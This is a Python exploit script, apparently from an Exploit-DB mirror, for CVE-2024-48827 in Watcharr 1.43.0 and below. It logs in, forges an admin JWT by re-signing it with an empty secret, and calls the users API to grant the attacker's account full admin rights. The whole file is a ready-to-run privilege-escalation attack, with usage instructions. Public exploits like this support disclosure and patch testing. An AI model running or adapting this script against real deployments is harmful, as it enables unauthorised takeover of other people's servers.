exploit-db-mirror/exploits/multiple/webapps/52130.py

# Exploit Title : Watcharr 1.43.0 - Remote Code Execution (RCE)
# CVE-2024-48827 exploit by Suphawith Phusanbai
# Affected Watcharr version 1.43.0 and below.
import argparse
import requests
import json
import jwt
from pyfiglet import Figlet

f = Figlet(font='slant',width=100)
print(f.renderText('CVE-2024-48827'))

#store JWT token and UserID \ เก็บ token กับ UserID
jwt_token = None
user_id = None

#login to obtain JWT token / ล็อคอินเพื่อรับ JWT Token
def login(host, port, username, password):
    url = f'http://{host}:{port}/api/auth/'
    #payload in login API request \ payload ใน json
    payload = {
        'username': username,
        'password': password
    }

    headers = {
        'Content-Type': 'application/json'
    }
    #login to obtain JWT token \ ล็อคอินเพิ่อเก็บ JWT token แล้วใส่ใน jwt_token object
    try:
        response = requests.post(url, data=json.dumps(payload), headers=headers)
        if response.status_code == 200:
            token = response.json().get('token')
            if token:
                print(f"[+] SUCCESS! JWT Token: {token}")
                global jwt_token
                jwt_token = token

                #decode JWT token and store UserID in UserID object \ ดีโค้ด JWT token แล้วเก็บค่า UserID ใส่ใน UserID object
                decoded_payload = jwt.decode(token, options={"verify_signature": False})
                global user_id
                user_id = decoded_payload.get('userId')

                return token
            else:
                print("[-] Check your password again!")
        else:
            print(f"[-] Failed :(")
            print(f"Response: {response.text}")
    except Exception as e:
        print(f"Error! HTTP response code: {e}")

#craft the admin token(to make this work you need to know admin username) \ สร้าง admin JWT token ขึ้นมาใหม่โดยใช้ token ที่ล็อคอิน
def create_new_jwt(original_token):
    try:
        decoded_payload = jwt.decode(original_token, options={"verify_signature": False})
        #userID = 1 is always the admin \ userID ลำดับที่ 1 คือ admin เสมอ
        decoded_payload['userId'] = 1
        new_token = jwt.encode(decoded_payload, '', algorithm='HS256')
        print(f"[+] New JWT Token: {new_token}")
        return new_token
    except Exception as e:
        print(f"[-] Failed to create new JWT: {e}")

#privilege escalation with the crafted JWT token \ PE โดยการใช้ crafted admin token
def privilege_escalation(host, port, adminuser, token):
    #specify API endpoint for giving users admin role \ เรียกใช้งาน API สำหรับให้สิทธิ์ user admin
    url = f'http://{host}:{port}/api/server/users/{user_id}'

    # permission 3 givefull access privs you can also use 6 and 9 to gain partial admin privileges. \ ให้สิทธิ์ admin ทั้งหมดด้วย permission = 3
    payload = {
        "permissions": 3
    }

    headers = {
        'Authorization': f'{token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(url, data=json.dumps(payload), headers=headers)
        if response.status_code == 200:
            print(f"[+] Privilege Escalation Successful! The current user is now an admin!")
        else:
            print(f"[-] Failed to escalate privileges. Response: {response.text}")
    except Exception as e:
        print(f"Error during privilege escalation: {e}")


#exampl usage: python3 CVE-2024-48827.py -u dummy -p dummy -host 172.22.123.13 -port 3080 -adminuser admin
#usage
if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit CVE-2024-48827 to obtain JWT token and escalate privileges.')
    parser.add_argument('-host', '--host', type=str, help='Host or IP address', required=True)
    parser.add_argument('-port', '--port', type=int, help='Port', required=True, default=3080)
    parser.add_argument('-u', '--username', type=str, help='Username for login', required=True)
    parser.add_argument('-p', '--password', type=str, help='Password for login', required=True)
    parser.add_argument('-adminuser', '--adminuser', type=str, help='Admin username to escalate privileges', required=True)
    args = parser.parse_args()

    #step 1: login
    token = login(args.host, args.port, args.username, args.password)

    #step 2: craft the admin token
    if token:
        new_token = create_new_jwt(token)
        #step 3: Escalate privileges with crafted token. Enjoy!
        if new_token:
            privilege_escalation(args.host, args.port, args.adminuser, new_token)